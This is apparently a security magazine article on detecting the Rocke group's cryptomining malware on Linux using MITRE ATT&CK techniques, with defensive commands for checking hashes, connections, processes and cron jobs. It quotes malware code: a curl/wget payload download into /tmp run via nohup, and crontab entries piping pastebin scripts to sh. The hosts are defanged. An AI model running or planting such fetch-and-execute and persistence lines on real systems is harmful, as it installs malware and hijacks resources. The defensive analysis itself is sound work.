Security has many facets and angles, and if you really want to be safe, you need to be aware of them all. One important skill is to become familiar with the logfiles on your system and the information they might reveal (see the box entitled "All About Logs"). But the attackers have become increasingly sophisticated in recent years, and to stay ahead of them, you need all the help you can get. Another important source of information is the MITRE ATT&CK website [1]. MITRE ATT&CK is a structured, globally available knowledge base describing tactics and attackers. In addition to tracking the various attack methods used in the wild, MITRE ATT&CK also provides clues that will help you look for evidence.

grep -E -r -o "([0-9]{1,3}\.){3}[0-9]{1,3}" | sort | uniq | grep -E -o "([0-9]{1,3}\.){3}[0-9]{1,3}" > our-data.txt

Searching for Evidence

It's best to learn from examples. One threat facing users today is attacks related to stealing system resources for the purposes of mining cryptocurrency. The techniques that hackers use are quite interesting and sometimes unconventional. The Rocke group is a good example. Rocke is a Chinese group of cyber criminals who specialize in malware attacks to gain access for crypto mining [2][3][4][5]. This group has been operating since 2018 and is dynamically developing its arsenal. The group evolves quickly and changes its techniques. Analysis of a Rocke group attack is not as easy as it might seem, but luckily, you can turn to the MITRE ATT&CK framework. Some of the techniques that MITRE ATT&CK associates with the Rocke group include:

• T1036.005 – Masquerading: Match Legitimate Name or Location
• T1053.003 – Scheduled Task/Job: Cron
• T1574.006 – Hijack Execution Flow: Dynamic Linker Hijacking

The following sections takes a closer look at these techniques and what to do about them, but before delving into the details, remember that it is always a good idea to look for suspicious files.

Malware often creates files in the following directories:

• /usr/local
• /usr/sbin
• /tmp

It is worth looking at these locations and checking if there are suspicious files in them. You might find file names similar to the correct ones, and sometimes a file might be generated automatically and take a series of numbers. It is good to check the hash of these files. If the hash is different from what it is supposed to be, that is an indication that the file has been replaced or tampered with. You can use the VirusTotal platform [6] to check whether the hash is what it is supposed to be. The following command will find every executable file and check its control sum (SHA256), and the results will be saved to the list.txt file:

find -type f -exec sha256sum '{}' \; > list.txt

T1036.005: Masquerading

Suppose the group downloads a payload using the curl or wet command. The configuration file and the malware binary file are saved in the /tmp directory called kthrotlds. The launch malware is using the nohup command, rejecting the output data and enabling the background binary file to be made. Performing this process is a form of masking. The system will constantly perform a process called kthrotlds, but the processes will not use binary files in the /tmp folder.

Listing 1 shows part of the malicious code.

01   if [ ${ARCH}x = "x86_64x" ]; then
02        (curl -fsSL hxxp://sowcar[].]com/t6/678/1552060180x1822611359.jpg -o \
03         /tmp/kthrotlds||wget -q hxxp://sowcar[].]com/t6/678/1552060180x1822611359.jpg -O \
04         /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
05    elif [ ${ARCH}x = "i686x" ]; then
06        (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -o \
07         /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -O \
08         /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
09    else
10        (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -o \
11         /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -O \
12         /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
13    fi
14        nohup /tmp/kthrotlds >/dev/null 2>&1 &

By default, Linux does not log information on open ports and connections. However, netstat comes to the rescue:

netstat -tupln

This command will return information on connections (port and IP address) to and from the system. You can trace the connections that are set and then track down the most undesirable ones.

Another way to check for a masked process is with the ps command:

ps auxf

This command will display a list of processes running in the system. A malicious process often appears in square brackets, meaning that there are no arguments at the command line and it is possibly running as a thread.

T1053.003 – Cron

Hackers use a variety of techniques to achieve persistent access to the system after restarting. One of these methods is to add tasks to the cron tool. Cron allows you to plan your tasks and gives you the ability to follow commands according to the schedule without logging into the system. Listing 2 shows a few crontab entries that could execute malicious code.

01 "*/10 * * * * root (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh
02   ##"
03
04 "*/15 * * * * (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh
05   ##"

In this case, the attacker does two things:

• Adds a new crontab entry that points to a malicious script.
• Places the malicious script in a folder, which will allow it to execute at a specific time defined in the crontab entry.

That is why it is always worth checking cron tasks to look for suspicious entries:

crontab -l

Malware can manipulate the cron utility in various ways, therefore it is also worth looking at the following locations:

• /var/spool/cron/root
• /var/spool/cron/crontabs/root
• /etc/cron.d/root
• /etc/cron.hourly/oanacroner
• /etc/cron.daily/oanacroner
• /etc/cron.monthly/oanacroner

Or perform a search to find other cron-related files and directories on your system.